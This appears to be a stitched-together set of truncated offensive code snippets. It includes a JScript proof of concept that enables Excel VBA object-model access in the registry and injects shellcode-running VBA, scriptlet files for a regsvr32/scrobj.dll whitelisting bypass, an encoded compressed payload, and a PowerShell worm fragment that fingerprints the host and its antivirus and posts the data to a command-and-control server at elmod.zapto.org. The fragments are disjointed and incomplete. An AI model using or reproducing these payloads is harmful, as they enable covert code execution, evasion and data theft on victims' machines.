using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
Create Your Strong Name Key -> key.snk | |
$key = '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' |
// NOTE(review): offensive PoC fragment (WSH JScript). It drives Excel over COM
// to inject a VBA module into a new workbook; the listing is truncated, so the
// remainder of the VBA payload and whatever runs it are not visible here.
// Start Excel via COM automation and keep the window hidden from the user.
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
// WScript.Shell is only used below for the registry write.
var WshShell = new ActiveXObject("WScript.Shell"); | |
// Read the installed Excel version so the registry path matches this install.
var Application_Version = objExcel.Version;//Auto-Detect Version | |
// HKCU write, so no elevation is required. AccessVBOM is the per-user
// "Trust access to the VBA project object model" switch; setting it to 1 is
// what makes the VBProject access further down succeed. Nothing in the visible
// lines restores the previous value, so this persists after the script exits
// and is a useful host-based detection/cleanup indicator.
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
// Fresh workbook to host the injected module.
var objWorkbook = objExcel.Workbooks.Add(); | |
// Add a VBA component; component type 1 is presumably vbext_ct_StdModule
// (a standard module) -- TODO confirm against the VBIDE enum.
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); | |
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ | |
// VBA source is assembled as a string with "\n" line separators. The first
// line declares kernel32!CreateThread with six randomized parameter names
// (obfuscation only; the signature is what matters). The rest of the VBA text
// continues past the end of this listing.
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n'; |
$EncodedCompressedFile = @';; | |
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 |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
remotable="true" | |
> |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
remotable="true" | |
> |
$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://elmod.zapto.org:1199/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
$EncodedCompressedFile = @' | |
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/jt/9f/53f28D9j36NX+vX/A1/zd/w1/g1fiv64zeTz/6CPfon/TUUsd9Tfv+1BG885uev8QfJ53/ob/hr0o/f8w9nAAzD/LQ/+HlKcL+LX35PAvkbeV/8Qvr/b0r//wN+jV8DH/9Gu7/Gr/E7eV/f+KS/xq/xG3h//gb097e9v8dt/q6ln3/ZbyFteay/ltdAPv4DxnVTT38Nxe33pP//JvT/3yZsRx//nuM6L6up4AqcGZYhsmv3JPyEyLUnP7/9a+CVX/fX+Ic+ovmgPn7NX4P//+v9Bh85nrjN8zvu/Dq/xn/9a/C7v/mv8WvU9GPV/Ga/xq+RJL9eRX8nv8av8R/8ukTZ/+DX+DW2aODJb/i7/BZ//G9LjX+j3+C3qR9S07/kN/htt35L+vwv+Q1+O/3529ff589/B/37d6z/Uf77d9K/f+f6d/818fcv0L9/lx8zvyT1lL/5XX7DX78i4ia/8W/xa2/91vLVb2Ta/Mb1L5E2v8mvX/028tFvar77zeo/W777zX/9inBMqt+OP9/67elH/ffTV7/N7/J7bv0O9Mcv/BbG+5th9L/mr/Hb/La/xq9Lg/41v/Vrbf0CHu+v8a1f47fc+bV+jce/Bk/Jb/5r/FL69tf5rf6vX/O3+b9o1Nsf/Rr1f0ig/iUSwV9r63dBLyn90/yuTLE/CE3lhd/wk1/j1//Wb7nza/4aJBWQV4ID |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Empire" | |
progid="Empire" | |
version="1.00" | |
classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
> | |
<!-- regsvr32 /s /i"C:\Bypass\STC_MsgBox.sct" scrobj.dll --> |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
remotable="true" | |
> |